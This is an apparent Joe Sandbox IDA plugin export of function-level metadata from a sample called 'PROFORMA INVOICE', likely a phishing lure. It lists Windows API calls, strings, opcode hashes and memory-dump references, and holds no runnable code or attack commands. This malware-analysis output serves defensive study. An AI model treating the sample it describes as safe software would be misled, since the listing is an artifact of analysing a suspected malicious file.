Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 09a254f3cb14adbd0152b8ffabb7a47ef8a38e510a6b4e8a1c816776744e589e
Instruction ID: 3db81861805a55a133dfdc068a5c1b00e95048abd5b8705b5d9817c237d9a5a6
Opcode Fuzzy Hash: 09a254f3cb14adbd0152b8ffabb7a47ef8a38e510a6b4e8a1c816776744e589e
Instruction Fuzzy Hash: 1221AFB2500208BEE711DB55CD84FFB7BECEB48758F10801AF505D6141EA64AD05AB71

Function 00FC90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F7D1BA
Part of subcall function 00F7D17C: GetStockObject.GDI32(00000011), ref: 00F7D1CE
Part of subcall function 00F7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F7D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FC915C
LoadLibraryW.KERNEL32(?), ref: 00FC9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FC9178
DestroyWindow.USER32(?), ref: 00FC9180

Strings

SysAnimate32, xrefs: 00FC9137

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 2eff0bbbce1790ce192c6d2c809c822888ce36cfd3c1be1d4e7c2348cc210e3f
Instruction ID: 802e21729fdf6805f63bdb58c50a9334dce68cb8c0280aedf1846af06ce4875a
Opcode Fuzzy Hash: 2eff0bbbce1790ce192c6d2c809c822888ce36cfd3c1be1d4e7c2348cc210e3f
Instruction Fuzzy Hash: 2D21BE71A0820BBFEF204E648D8BFBA37A9EF99374F18021CF95496190C7B18C51B760

Function 00FA9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00FA9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FA95B9
GetStdHandle.KERNEL32(0000000C), ref: 00FA95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FA9605

Strings

nul, xrefs: 00FA9600

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 36f776651bb0ccc36d7e0ae265946e1ab388780d5ee0370f4c9a47f3087a912d
Instruction ID: c85ba331ce68d60b2e5c214ecd8fd6b31e1b638c0cf93d0e30a438cc30213525
Opcode Fuzzy Hash: 36f776651bb0ccc36d7e0ae265946e1ab388780d5ee0370f4c9a47f3087a912d
Instruction Fuzzy Hash: 512181B5D04209AFDB219F25DC46A9A77F8AF46720F244A29FDA1DB2D0D7B0D940EB10

Function 00FA9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FA9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FA9683
GetStdHandle.KERNEL32(000000F6), ref: 00FA9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FA96CE

Strings

nul, xrefs: 00FA96C9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 39fafc176b0014248a08fce492eb9e114a20feb4360344dda60aa070add406ad
Instruction ID: 5cc96f9b7a5139a5f80ad4b875b1499b90345cf2ee01f00836a31512264c7128
Opcode Fuzzy Hash: 39fafc176b0014248a08fce492eb9e114a20feb4360344dda60aa070add406ad
Instruction Fuzzy Hash: 602171B19042099FDB249F699C44F9A77E8AF46730F200A29FDB1DB3D0D7B09841EB51

Function 00FADAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FADB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FADB5E
__swprintf.LIBCMT ref: 00FADB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,00FFDC00), ref: 00FADBB5

Strings

%lu, xrefs: 00FADB71

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: fe2a87fb9c73a5d35e531af9acebee6a7d6e6a0cfef0a949c2ea762bacd2d850
Instruction ID: e0475bdacd71de25b4f13da9348b981a15f3fe01b6587b0645446c1f5992da5c
Opcode Fuzzy Hash: fe2a87fb9c73a5d35e531af9acebee6a7d6e6a0cfef0a949c2ea762bacd2d850
Instruction Fuzzy Hash: 1C219575A00148AFCB10EFA5CD85DEEB7B8EF89704B004069F549DB261DB74EA01EB61

Function 00F9C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F9C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F9C84A
Part of subcall function 00F9C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F9C85D
Part of subcall function 00F9C82D: GetCurrentThreadId.KERNEL32 ref: 00F9C864
Part of subcall function 00F9C82D: AttachThreadInput.USER32(00000000), ref: 00F9C86B

GetFocus.USER32 ref: 00F9CA05

Part of subcall function 00F9C876: GetParent.USER32(?), ref: 00F9C884

GetClassNameW.USER32(?,?,00000100), ref: 00F9CA4E
EnumChildWindows.USER32(?,00F9CAC4), ref: 00F9CA76
__swprintf.LIBCMT ref: 00F9CA90

Strings

%s%d, xrefs: 00F9CA8A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: ec5878104717bcaff4618338959a45a230f8326e6cb138df810cfb76969f450c
Instruction ID: 0ce787d4a51e40bfc8002ca9f620014a93298157afd91b5ae4064f8a16c2a355
Opcode Fuzzy Hash: ec5878104717bcaff4618338959a45a230f8326e6cb138df810cfb76969f450c
Instruction Fuzzy Hash: 131181716002097BEF11BFA08CC5FE9376CAF44714F00806AFE08AA182CB789945FBB1

Function 00FC1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FC19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FC1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00FC1B49
CloseHandle.KERNEL32(?), ref: 00FC1BBF

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 1a307fa47cb462611b5930362345b9bb24fc1238225ad94abb41d93955e02ff4
Instruction ID: 2daa27dcfced2d6e0b052a364aa18fcaf0f1c7264f6c1d9a96232f62e7d90bb7
Opcode Fuzzy Hash: 1a307fa47cb462611b5930362345b9bb24fc1238225ad94abb41d93955e02ff4
Instruction Fuzzy Hash: B1819070A00205ABDF119F64CD86BADBBE5FF44720F04C45AF909AF382D7B8AD419B91

Function 00FA1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FA1CB4
VariantClear.OLEAUT32(00000013), ref: 00FA1D26
VariantClear.OLEAUT32(00000000), ref: 00FA1D81
VariantClear.OLEAUT32(?), ref: 00FA1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FA1E26

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 65c250f037fa4256cc33147de001bec12eb1b68a68fd93798bb5bf7466277760
Instruction ID: a1479d14ba2977b410e67d126ce4677b18078203e9593e52310a4951e94a7d37
Opcode Fuzzy Hash: 65c250f037fa4256cc33147de001bec12eb1b68a68fd93798bb5bf7466277760
Instruction Fuzzy Hash: C75137B5A00209AFDB14CF58C880EAAB7B8FF4D314F168559E959DB345E730EA51CBA0

Function 00FC0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00FC06EE
GetProcAddress.KERNEL32(00000000,?), ref: 00FC077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00FC079B
GetProcAddress.KERNEL32(00000000,?), ref: 00FC07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 00FC07FB

Part of subcall function 00F7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00FAA574,?,?,00000000,00000008), ref: 00F7E675
Part of subcall function 00F7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00FAA574,?,?,00000000,00000008), ref: 00F7E699

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 91146a3b27063017bcca4a0763949ff3932cd8c8e62106c486e59470a7832e01
Instruction ID: 601770f37df0ed5a6c5ec05cb0c4b474203bb5f388b5b946353b3c4690071d27
Opcode Fuzzy Hash: 91146a3b27063017bcca4a0763949ff3932cd8c8e62106c486e59470a7832e01
Instruction Fuzzy Hash: B0516C75E0020ADFCB04EFA8C981EADB7B5BF58310B048059E955AB351DB34ED46EF80

Function 00FC2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FC2BB5,?,?), ref: 00FC3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FC2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FC2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FC2F75
RegCloseKey.ADVAPI32(?,?), ref: 00FC2FA1
RegCloseKey.ADVAPI32(00000000), ref: 00FC2FAE

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: ca4bc36630f31f216b910cc7c038abe1489d1b88c780e94bcfaf274ed274fa90
Instruction ID: 4f1bc346c9bead0f52f3327464d8c4b62ce7240b4227e5e26f56ea5395944631
Opcode Fuzzy Hash: ca4bc36630f31f216b910cc7c038abe1489d1b88c780e94bcfaf274ed274fa90
Instruction Fuzzy Hash: EE514972608209AFD704EB54CD82F6AB7F9FF88314F04881DF59597291DB74E904EB92

Function 00FCCCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be2c3d12de47620878aad08234f8428eb69ef4b93340ae65ec1c732591aa0a48
Instruction ID: 6aa209a453326faab7630faec97f534d1a5bcfcefcd07da06da802fadb3c38df
Opcode Fuzzy Hash: be2c3d12de47620878aad08234f8428eb69ef4b93340ae65ec1c732591aa0a48
Instruction Fuzzy Hash: 0B41B63AD0024AAFC720DF68CD4AFA97B65EB09320F150169F96EA72D1C730AD41E6D0

Function 00FB1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FB12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FB12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FB131C

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FB1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FB1349

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 313d7c0d9bce429cca1ac664e1c36a119590decf4e55c1f5b3f3a1f15a509c7f
Instruction ID: 1074d29b6e90f4794438606d7eed9aca6c17670ba934af2949bfa778b172839a
Opcode Fuzzy Hash: 313d7c0d9bce429cca1ac664e1c36a119590decf4e55c1f5b3f3a1f15a509c7f
Instruction Fuzzy Hash: 74410935A00109DFDF01EF64C991AAEBBF9FF08310B148099E90AAB361DB35ED01EB51

Function 00F9B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F9B369
PostMessageW.USER32(?,00000201,00000001), ref: 00F9B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F9B41B
PostMessageW.USER32(?,00000202,00000000), ref: 00F9B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F9B431

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 70407bc481109307d286a9be5ae26faf5a7679aab05a1bb0a05a919a62d1cbca
Instruction ID: 7715bde89bac73ed7c67c5d5134ad39640f054684e62e15cca1a5115cdb25f74
Opcode Fuzzy Hash: 70407bc481109307d286a9be5ae26faf5a7679aab05a1bb0a05a919a62d1cbca
Instruction Fuzzy Hash: 2B31B47190025DEBEF14CF68EE8DA9E7BB5EB44325F104229F921AB1D1C3B09954EB50

Function 00F9DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00F9DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F9DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F9DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F9DC52
_wcsstr.LIBCMT ref: 00F9DC5C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 5e983cfc1feee9352cd680a59427cb1a40db318b319ec6bf9ce5b23e9113c276
Instruction ID: fff94a6085df9731f8449b8c2adad846717dc869b52254d4e651bac6ce4b4ffd
Opcode Fuzzy Hash: 5e983cfc1feee9352cd680a59427cb1a40db318b319ec6bf9ce5b23e9113c276
Instruction Fuzzy Hash: 56210772604144BBFF159F39DC49E7B7BACDF45760F20802AF809CA191EAA5DC01F6A0

Function 00FCDE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

GetWindowLongW.USER32(?,000000F0), ref: 00FCDEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00FCDED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FCDEEC
GetSystemMetrics.USER32(00000004), ref: 00FCDF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00FB3A1E,00000000), ref: 00FCDF32

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 8001476a7c7145ac15b9d84ac9dbc4a4e0ffec944ab92f9815a67875e96776b1
Instruction ID: 1e56cb14f43f97846530c1e7f009b576f902c7be38d7171f3d5440a716967bbb
Opcode Fuzzy Hash: 8001476a7c7145ac15b9d84ac9dbc4a4e0ffec944ab92f9815a67875e96776b1
Instruction Fuzzy Hash: 8E218E71A11256AFCB209F788D89F6E3794BB55334B15073CF966CA5E0D7309850EB80

Function 00F9BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F9BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F9BCC2
__itow.LIBCMT ref: 00F9BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F9BD00
__itow.LIBCMT ref: 00F9BD11

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 524d5e47c7b00a4f3628a55d40ec3967a2ea2d9da22fbac6439fde424373397f
Instruction ID: ada5c8cdce0de9aad4edd1c5e78216542675f70961862d708536bf9a9ef9e0f2
Opcode Fuzzy Hash: 524d5e47c7b00a4f3628a55d40ec3967a2ea2d9da22fbac6439fde424373397f
Instruction Fuzzy Hash: D621C636B002187BEF11AB659D86FEE7B69AF89B10F100025F905EF181DB648D05B7E1

Function 00FA6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00F650E6: _wcsncpy.LIBCMT ref: 00F650FA

GetFileAttributesW.KERNEL32(?,?,?,?,00FA60C3), ref: 00FA6369
GetLastError.KERNEL32(?,?,?,00FA60C3), ref: 00FA6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FA60C3), ref: 00FA6388
_wcsrchr.LIBCMT ref: 00FA63AA

Part of subcall function 00FA6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FA60C3), ref: 00FA63E0

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 91035ef19f466310cd7583357f174d31230d158605b640a36eddc184988b8ea6
Instruction ID: d466db7fe90bef2bf3e80a6199e800029948a9c53d11bf789aa62bc4ff5d38e8
